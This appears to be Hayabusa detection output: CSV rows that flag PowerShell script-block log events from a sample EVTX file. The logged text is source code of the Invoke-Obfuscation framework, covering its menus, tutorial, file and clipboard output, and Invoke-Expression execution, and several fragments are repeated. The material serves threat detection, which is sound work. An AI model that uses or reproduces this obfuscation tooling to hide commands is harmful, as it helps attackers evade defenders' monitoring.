$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. 
Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . 
((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. 
Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. 
$Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. 
If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. 
If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. 
